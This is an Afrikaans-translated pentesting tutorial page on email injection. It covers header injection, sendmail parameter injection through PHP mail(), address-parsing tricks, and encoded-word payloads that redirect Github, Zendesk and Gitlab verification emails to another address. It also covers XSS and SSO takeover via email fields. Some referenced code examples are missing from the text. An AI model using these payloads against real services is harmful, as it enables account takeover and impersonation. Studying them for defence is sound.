Email Injections
Last updated
Last updated
Gebruik Trickest om maklik te bou en outomatiese werksvloei te skep wat deur die wêreld se mees gevorderde gemeenskapstools aangedryf word. Kry Toegang Vandag:
Die boodskap sal na die ontvanger en ontvanger1 rekeninge gestuur word.
Die boodskap sal na die oorspronklike ontvanger en die aanvaller rekening gestuur word.
Die vals onderwerp sal by die oorspronklike onderwerp gevoeg word en in sommige gevalle dit vervang. Dit hang af van die e-posdiens se gedrag.
Injek een twee-lyn voeding, skryf dan jou boodskap om die liggaam van die boodskap te verander.
Hierdie afdeling gaan gebaseer wees op hoe om hierdie parameter te misbruik, veronderstel dat 'n aanvaller dit beheer.
Hierdie parameter gaan by die opdraglyn gevoeg word wat PHP gaan gebruik om die binêre sendmail aan te roep. Dit sal egter gesuiwer word met die funksie escapeshellcmd($additional_parameters)
.
'n Aanvaller kan uittrekparameters vir sendmail inspuit in hierdie geval.
sendmail-koppelvlak word verskaf deur die MTA e-pos sagteware (Sendmail, Postfix, Exim ens.) wat op die stelsel geïnstalleer is. Alhoewel die basiese funksionaliteit (soos -t -i -f parameters) dieselfde bly vir kompatibiliteitsredes, verskil ander funksies en parameters grootliks, afhangende van die geïnstalleerde MTA.
Hier is 'n paar voorbeelde van verskillende manbladsye van die sendmail-opdrag/koppelvlak:
Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html
Postfix MTA: http://www.postfix.org/mailq.1.html
Exim MTA: https://linux.die.net/man/8/eximReferences
Afhangende van die oorsprong van die sendmail binêre is verskillende opsies ontdek om dit te misbruik en leak lêers of selfs arbitrêre opdragte uit te voer. Kyk hoe in https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
Let daarop dat as jy daarin slaag om 'n rekening in 'n diens met 'n arbitrêre domeinnaam (soos Github, Gitlab, CloudFlare Zero trust...) te skep en dit te verifieer deur die verifikasie-e-pos in jou e-posadres te ontvang, jy dalk toegang kan verkry tot sensitiewe plekke van die slagoffermaatskappy
Die simbole: +, - en {} kan in seldsame gevalle gebruik word vir etikettering en word deur die meeste e-posbedieners geignoreer
Byvoorbeeld: john.doe+intigriti@example.com → john.doe@example.com
Kommentaar tussen hakies () aan die begin of die einde sal ook geignoreer word
Byvoorbeeld: john.doe(intigriti)@example.com → john.doe@example.com
Jy kan ook IP's as domeinnames tussen vierkantige hakies gebruik:
john.doe@[127.0.0.1]
john.doe@[IPv6:2001:db8::1]
Soos verduidelik in hierdie navorsing, kan e-posname ook gekodeerde karakters bevat:
PHP 256 oorgeloop: PHP chr
funksie sal voortgaan om 256 by 'n karakter te voeg totdat dit positief word en dan die operasie %256
uitvoer.
String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @
Die doel van hierdie truuk is om te eindig met 'n inspuiting soos RCPT TO:<"collab@psres.net>collab"@example.com>
wat die verifikasie-e-pos na 'n ander e-posadres as die verwagte een sal stuur (dus om 'n ander e-posadres binne die e-posnaam in te voer en die sintaksis te breek wanneer die e-pos gestuur word)
Verskillende kodering:
Payloads:
Github: =?x?q?collab=40psres.net=3e=00?=foo@example.com
Let op die geënkodeerde @
as =40, die geënkodeerde >
as =3e
en null
as =00
Dit sal die verifikasie-e-pos na collab@psres.net
stuur
Zendesk: "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com
Dieselfde truuk as voorheen, maar voeg 'n gewone aanhaling aan die begin by en geënkodeerde aanhaling =22
voor die geënkodeerde @
en dan begin en sluit 'n paar aanhalings voor die volgende e-pos om die sintaksis wat intern deur Zendesk gebruik word, reg te stel
Dit sal die verifikasie-e-pos na collab@psres.net
stuur
Gitlab: =?x?q?collab=40psres.net_?=foo@example.com
Let op die gebruik van die onderstreep as 'n spasie om adres te skei
Dit sal die verifikasie-e-pos na collab@psres.net
stuur
Punycode: Deur Punycode te gebruik, was dit moontlik om 'n etiket <style
in Joomla in te spuit en dit te misbruik om die CSRF-token via CSS-uitvloeiing te steel.
Daar is 'n Burp Suite Turbo Intruder script om hierdie soort kombinasies te fuzz om te probeer om e-posformate aan te val. Die skrip het reeds potensieel werkende kombinasies.
Dit is ook moontlik om Hackvertor te gebruik om 'n e-pos splitsingaanval te skep
Sommige dienste soos github of salesforce laat jou toe om 'n e-posadres met XSS payloads daarop te skep. As jy hierdie verskaffers kan gebruik om in ander dienste aan te meld en hierdie dienste nie korrek sanitiseer die e-pos nie, kan jy XSS veroorsaak.
As 'n SSO-diens jou toelaat om 'n rekening te skep sonder om die gegewe e-posadres te verifieer (soos salesforce) en dan kan jy daardie rekening gebruik om in 'n ander diens aan te meld wat vertrou op salesforce, kan jy toegang tot enige rekening verkry. &#xNAN;Note dat salesforce aandui of die gegewe e-pos geverifieer was of nie, maar die toepassing moet hierdie inligting in ag neem.
Jy kan 'n e-pos stuur met From: company.com en Replay-To: attacker.com en as enige outomatiese antwoord gestuur word omdat die e-pos van 'n interne adres gestuur is, mag die aanvaller in staat wees om daardie antwoord te ontvang.
Sekere dienste, soos AWS, implementeer 'n drempel bekend as die Hard Bounce Rate, wat tipies op 10% gestel is. Dit is 'n kritieke maatstaf, veral vir e-posafleweringsdienste. Wanneer hierdie koers oorskry word, kan die diens, soos AWS se e-posdiens, opgeskort of geblokkeer word.
'n hard bounce verwys na 'n e-pos wat aan die sender teruggestuur is omdat die ontvanger se adres ongeldig of nie-bestaande is nie. Dit kan om verskeie redes gebeur, soos die e-pos wat na 'n nie-bestaande adres gestuur word, 'n domein wat nie werklik is nie, of die ontvanger se bediener se weiering om e-posse te aanvaar.
In die konteks van AWS, as jy 1000 e-posse stuur en 100 daarvan lei tot hard bounces (weens redes soos ongeldig adres of domeine), beteken dit 'n 10% hard bounce koers. Om hierdie koers te bereik of te oorskry kan AWS SES (Simple Email Service) laat blokkeer of jou e-pos stuur vermoëns opskort.
Dit is van kardinale belang om 'n lae hard bounce koers te handhaaf om ononderbroke e-posdiens te verseker en die sender se reputasie te handhaaf. Om die kwaliteit van die e-posadresse in jou poslyste te monitor en te bestuur kan aansienlik help om dit te bereik.
Vir meer gedetailleerde inligting kan AWS se amptelike dokumentasie oor die hantering van bounces en klagtes geraadpleeg word AWS SES Bounce Handling.
Gebruik Trickest om maklik te bou en werkvloei te outomatiseer wat deur die wêreld se mees gevorderde gemeenskap gereedskap aangedryf word. Kry Toegang Vandag:
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)